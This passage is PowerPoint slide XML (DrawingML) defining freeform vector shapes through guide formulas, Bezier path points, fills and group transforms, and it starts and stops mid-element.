                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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7" name="Freeform 721">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B1AAB5-DF4A-4FF3-8568-3DEBD259655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5" y="3419"/>
                <a:ext cx="468" cy="545"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 198"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 198"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 198"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 198"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 198"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 30 w 198"/>
                  <a:gd name="T11" fmla="*/ 11 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 198"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 198"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 198"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 198"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 62 w 198"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 198"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 198"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 198"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 198"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 198"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 198"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 198"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 198"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 159 w 198"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 192 w 198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8" name="Freeform 722">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EACA87AE-D1B8-430A-A148-4CCC992CC40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86" y="3390"/>
                <a:ext cx="156" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="9" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="29" y="39"/>
                    </a:cubicBezTo>
                    <a:close/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9" name="Freeform 723">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27DA8849-B3CE-4BEA-832A-5D396C39CAF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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1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0" name="Freeform 724">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E10AA12-AB7A-4D5D-96C4-0CEF4D0C13A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65" y="3265"/>
                <a:ext cx="191" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 81"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 81"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 81"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 80 w 81"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 39 w 81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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="63"/>
                      <a:pt x="21" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="78"/>
                      <a:pt x="81" y="60"/>
                      <a:pt x="80" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="17"/>
                      <a:pt x="61" y="0"/>
                      <a:pt x="39" y="1"/>
                    </a:cubicBezTo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1" name="Freeform 725">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4954BDF0-7E4A-41B9-A505-4DBCB9BFA2D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38" y="3898"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="69A2E1"/>
              </a:solidFill>
              <a:ln w="6350" cap="rnd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656" name="Group 943">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5317632E-C5CF-4C2B-A19C-D9E8BA591B8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713143" y="3494694"/>
              <a:ext cx="198510" cy="468128"/>
              <a:chOff x="74" y="-3287"/>
              <a:chExt cx="470" cy="1119"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="880" name="Freeform 944">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A6AB42-6FBF-40D6-A49D-DD562ECE50D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94" y="-2746"/>
                <a:ext cx="211" cy="578"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 89"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 11 w 89"/>
                  <a:gd name="T3" fmla="*/ 10 h 245"/>
                  <a:gd name="T4" fmla="*/ 2 w 89"/>
                  <a:gd name="T5" fmla="*/ 0 h 245"/>
                  <a:gd name="T6" fmla="*/ 2 w 89"/>
                  <a:gd name="T7" fmla="*/ 36 h 245"/>
                  <a:gd name="T8" fmla="*/ 2 w 89"/>
                  <a:gd name="T9" fmla="*/ 205 h 245"/>
                  <a:gd name="T10" fmla="*/ 43 w 89"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 43 w 89"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88 w 89"/>
                  <a:gd name="T15" fmla="*/ 218 h 245"/>
                  <a:gd name="T16" fmla="*/ 88 w 89"/>
                  <a:gd name="T17" fmla="*/ 156 h 245"/>
                  <a:gd name="T18" fmla="*/ 89 w 89"/>
                  <a:gd name="T19" fmla="*/ 7 h 245"/>
                  <a:gd name="T20" fmla="*/ 89 w 89"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 89"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 62 w 89"/>
                  <a:gd name="T25" fmla="*/ 2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9" h="245">
                    <a:moveTo>
                      <a:pt x="62" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="19"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="11" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="4"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="18"/>
                      <a:pt x="2" y="32"/>
                      <a:pt x="2" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2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3" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="43" y="211"/>
                      <a:pt x="43" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="245"/>
                      <a:pt x="86" y="235"/>
                      <a:pt x="88" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="201"/>
                      <a:pt x="88" y="171"/>
                      <a:pt x="88" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="140"/>
                      <a:pt x="89" y="47"/>
                      <a:pt x="89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6" y="16"/>
                      <a:pt x="70" y="22"/>
                      <a:pt x="62" y="20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1" name="Freeform 945">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2AD5B3-9FCB-4B79-81F9-4896BF6B339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94" y="-2746"/>
                <a:ext cx="211" cy="578"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 89"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 11 w 89"/>
                  <a:gd name="T3" fmla="*/ 10 h 245"/>
                  <a:gd name="T4" fmla="*/ 2 w 89"/>
                  <a:gd name="T5" fmla="*/ 0 h 245"/>
                  <a:gd name="T6" fmla="*/ 2 w 89"/>
                  <a:gd name="T7" fmla="*/ 36 h 245"/>
                  <a:gd name="T8" fmla="*/ 2 w 89"/>
                  <a:gd name="T9" fmla="*/ 205 h 245"/>
                  <a:gd name="T10" fmla="*/ 43 w 89"/>
                  <a:gd name="T11" fmla="*/ 204 h 245"/>
                  <a:gd name="T12" fmla="*/ 43 w 89"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 88 w 89"/>
                  <a:gd name="T15" fmla="*/ 218 h 245"/>
                  <a:gd name="T16" fmla="*/ 88 w 89"/>
                  <a:gd name="T17" fmla="*/ 156 h 245"/>
                  <a:gd name="T18" fmla="*/ 89 w 89"/>
                  <a:gd name="T19" fmla="*/ 7 h 245"/>
                  <a:gd name="T20" fmla="*/ 89 w 89"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 89 w 89"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 62 w 89"/>
                  <a:gd name="T25" fmla="*/ 2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9" h="245">
                    <a:moveTo>
                      <a:pt x="62" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="19"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="11" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="4"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="18"/>
                      <a:pt x="2" y="32"/>
                      <a:pt x="2" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2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3" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="43" y="211"/>
                      <a:pt x="43" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="245"/>
                      <a:pt x="86" y="235"/>
                      <a:pt x="88" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="201"/>
                      <a:pt x="88" y="171"/>
                      <a:pt x="88" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="140"/>
                      <a:pt x="89" y="47"/>
                      <a:pt x="89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6" y="16"/>
                      <a:pt x="70" y="22"/>
                      <a:pt x="62" y="20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2" name="Freeform 946">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C33436F-6C4C-4DC5-8DC4-F7C66068339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74" y="-3134"/>
                <a:ext cx="470" cy="546"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 31 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 63 w 199"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 193 w 199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9" h="231">
                    <a:moveTo>
                      <a:pt x="193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6" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="9"/>
                      <a:pt x="69" y="3"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="34" y="3"/>
                      <a:pt x="31" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29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4"/>
                      <a:pt x="63" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122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1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2" y="109"/>
                      <a:pt x="148" y="149"/>
                      <a:pt x="160" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="231"/>
                      <a:pt x="199" y="218"/>
                      <a:pt x="193" y="194"/>
                    </a:cubicBezTo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3" name="Freeform 947">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31DF043-A1D2-4ED6-8C1F-46468E411CD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74" y="-3134"/>
                <a:ext cx="470" cy="546"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 231"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 231"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 231"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 12 h 231"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 231"/>
                  <a:gd name="T10" fmla="*/ 31 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 231"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 231"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 231"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 231"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 231"/>
                  <a:gd name="T20" fmla="*/ 63 w 199"/>
                  <a:gd name="T21" fmla="*/ 174 h 231"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 188 h 231"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 231"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 231"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 87 h 231"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 70 h 231"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 69 h 231"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 70 h 231"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 87 h 231"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 203 h 231"/>
                  <a:gd name="T40" fmla="*/ 193 w 199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9" h="231">
                    <a:moveTo>
                      <a:pt x="193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6" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="9"/>
                      <a:pt x="69" y="3"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="34" y="3"/>
                      <a:pt x="31" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29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4"/>
                      <a:pt x="63" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122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1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2" y="109"/>
                      <a:pt x="148" y="149"/>
                      <a:pt x="160" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="231"/>
                      <a:pt x="199" y="218"/>
                      <a:pt x="193" y="19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4" name="Freeform 948">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D0108E-4229-4885-8626-814C1F4D45D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77" y="-2654"/>
                <a:ext cx="24" cy="389"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 12 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="16"/>
                      <a:pt x="9" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="8"/>
                      <a:pt x="1" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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5" name="Freeform 949">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBF55A6C-5325-4472-A2D8-931AC951E9C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19" y="-3134"/>
                <a:ext cx="376" cy="449"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 150 w 159"/>
                  <a:gd name="T1" fmla="*/ 49 h 190"/>
                  <a:gd name="T2" fmla="*/ 124 w 159"/>
                  <a:gd name="T3" fmla="*/ 24 h 190"/>
                  <a:gd name="T4" fmla="*/ 106 w 159"/>
                  <a:gd name="T5" fmla="*/ 18 h 190"/>
                  <a:gd name="T6" fmla="*/ 69 w 159"/>
                  <a:gd name="T7" fmla="*/ 72 h 190"/>
                  <a:gd name="T8" fmla="*/ 68 w 159"/>
                  <a:gd name="T9" fmla="*/ 181 h 190"/>
                  <a:gd name="T10" fmla="*/ 69 w 159"/>
                  <a:gd name="T11" fmla="*/ 72 h 190"/>
                  <a:gd name="T12" fmla="*/ 50 w 159"/>
                  <a:gd name="T13" fmla="*/ 14 h 190"/>
                  <a:gd name="T14" fmla="*/ 66 w 159"/>
                  <a:gd name="T15" fmla="*/ 8 h 190"/>
                  <a:gd name="T16" fmla="*/ 41 w 159"/>
                  <a:gd name="T17" fmla="*/ 2 h 190"/>
                  <a:gd name="T18" fmla="*/ 12 w 159"/>
                  <a:gd name="T19" fmla="*/ 12 h 190"/>
                  <a:gd name="T20" fmla="*/ 0 w 159"/>
                  <a:gd name="T21" fmla="*/ 73 h 190"/>
                  <a:gd name="T22" fmla="*/ 30 w 159"/>
                  <a:gd name="T23" fmla="*/ 84 h 190"/>
                  <a:gd name="T24" fmla="*/ 35 w 159"/>
                  <a:gd name="T25" fmla="*/ 47 h 190"/>
                  <a:gd name="T26" fmla="*/ 34 w 159"/>
                  <a:gd name="T27" fmla="*/ 164 h 190"/>
                  <a:gd name="T28" fmla="*/ 44 w 159"/>
                  <a:gd name="T29" fmla="*/ 174 h 190"/>
                  <a:gd name="T30" fmla="*/ 94 w 159"/>
                  <a:gd name="T31" fmla="*/ 188 h 190"/>
                  <a:gd name="T32" fmla="*/ 121 w 159"/>
                  <a:gd name="T33" fmla="*/ 169 h 190"/>
                  <a:gd name="T34" fmla="*/ 121 w 159"/>
                  <a:gd name="T35" fmla="*/ 112 h 190"/>
                  <a:gd name="T36" fmla="*/ 120 w 159"/>
                  <a:gd name="T37" fmla="*/ 112 h 190"/>
                  <a:gd name="T38" fmla="*/ 121 w 159"/>
                  <a:gd name="T39" fmla="*/ 112 h 190"/>
                  <a:gd name="T40" fmla="*/ 119 w 159"/>
                  <a:gd name="T41" fmla="*/ 87 h 190"/>
                  <a:gd name="T42" fmla="*/ 118 w 159"/>
                  <a:gd name="T43" fmla="*/ 75 h 190"/>
                  <a:gd name="T44" fmla="*/ 117 w 159"/>
                  <a:gd name="T45" fmla="*/ 70 h 190"/>
                  <a:gd name="T46" fmla="*/ 117 w 159"/>
